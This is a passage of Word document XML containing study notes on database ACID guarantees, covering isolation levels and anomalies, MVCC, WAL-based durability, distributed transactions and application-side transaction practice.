    <w:p w14:paraId="5052A105" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CLRs: compensation log records make undo idempotent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF82725" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27026041" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  In application: use transaction blocks for all related operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21335EBA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                  never let partial operations be visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5D97D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                  handle exceptions by rolling back, not silently ignoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23357B09" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="55BDCDF4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Consistency — The Validity Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92E0A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  What: transaction moves database from one valid state to another valid state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C07C45" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  How: database enforces schema constraints (PK, FK, CHECK, NOT NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C3F9B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       application enforces business invariants (must check within transaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0DD4D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C68B18" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Database-enforced: UNIQUE, FOREIGN KEY, CHECK, NOT NULL, EXCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2F36F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Application-enforced: "at least one doctor on call", "quantity &gt; 0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1B4DB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913ECA1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Critical insight: application must put business invariant checks INSIDE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69C9BD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                    the same transaction that makes the data changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D04D7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                    Checking then changing outside a transaction = TOCTOU race</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F9A40" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="14AD638B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Isolation — The Concurrency Illusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD07A40" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  What: concurrent transactions behave as if they were serial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEED048" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  How: MVCC (multiple row versions) + locks + isolation levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B90445" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E581B1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Anomaly hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD26BD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Dirty read → prevented by Read Committed (default in most databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3E66C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Non-repeatable read → prevented by Repeatable Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B8BD6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Phantom read → prevented by Serializable (or PostgreSQL RR with MVCC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5058FA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Write skew → prevented ONLY by Serializable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01722632" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Lost update → prevented by SELECT FOR UPDATE or Repeatable Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1330088F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C518DD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Isolation levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08579D22" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read Committed: most databases default, prevents dirty reads only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433DE15" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Repeatable Read: stable reads within transaction (PostgreSQL: also prevents phantoms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB9AB6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Serializable: gold standard, eliminates all anomalies (2PL or SSI implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB40D3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82B4E5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  MVCC mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206291A8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    xmin/xmax: row version visibility timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A930E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Snapshot: what transactions are visible at my start time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79683C53" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    VACUUM: garbage collect old row versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF3DDB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554C9C2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Application: choose isolation level based on anomalies that matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CCF117" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               Use Serializable for complex business invariants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149E27D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               Use SELECT FOR UPDATE for explicit pessimistic locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8294CC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               Use version numbers for optimistic concurrency control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E934992" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="737A62CB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Durability — The Persistence Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392CF038" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  What: committed transactions survive any subsequent failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C087288" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  How: WAL fsynced to disk before COMMIT returns to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E8B3F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Replication: WAL sent to replicas for multi-machine durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD0C070" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C734647" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Durability layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5BF779" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Process crash: WAL on local disk survives (replay on restart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C31A32A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Machine failure: synchronous replica has WAL (promote replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D63AA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Datacenter failure: async replicas in other regions (small data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF54FB0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Regional disaster: geo-distributed replicas (larger data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF1876" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A34B9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  fsync is the durability boundary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA5461D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    COMMIT = WAL written + fsynced to disk = durable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7FCD7C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    synchronous_commit=off: faster but loses last 200ms on crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FAC6C4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA83A4C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Operational requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D1616F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Regular VACUUM (prevent dead tuple accumulation + TXID wraparound)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593A16A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    WAL archiving (point-in-time recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA41AED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Synchronous replication (zero data loss failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9D182" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Monitoring: replication lag, TXID age, WAL archiving lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD75924" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="3283B004" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>The Distributed ACID Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01045FB3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Single node: all four properties achievable with known mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD80C21" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Multiple nodes: requires 2PC (atomic), consensus (durable), coordination (isolated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E560703" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0557C5D6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Cost: each cross-node guarantee adds network round trips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D6655" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        Serializable distributed: ~10ms+ per transaction (coordination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B7837" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F8556" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Modern solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174B064B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Spanner: TrueTime + Paxos + 2PC = global external consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D1AC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CockroachDB: HLC + Raft + SSI = Postgres-compatible distributed SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273817BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF354ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Practical advice: use sharding/partitioning to keep transactions local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DC277" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                    cross-shard transactions are expensive — design to minimize them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA3C2E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                    Sagas for long workflows (eventual consistency + compensation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A136861" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="55984FDE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>The Application's Responsibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CD096" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Database provides: atomicity mechanics, isolation mechanisms, durability infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1AFBA2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Application must: use them correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05345A56" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A38AF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use transactions for: all operations that must succeed or fail together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD6832" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use appropriate isolation: Serializable for complex invariants, RC for simple CRUD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2F8BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Lock appropriately: SELECT FOR UPDATE when reading-then-writing same rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D5BCE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Design for retry: Serializable transactions may abort → must be idempotent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7ABF3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Keep transactions short: long transactions = long locks = blocked concurrent requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C7960" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Express constraints in schema: let the database enforce what it can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B19182A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Check business invariants inside transactions: not before, not after</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0D741" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ACID is not what databases do — it is what applications require.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
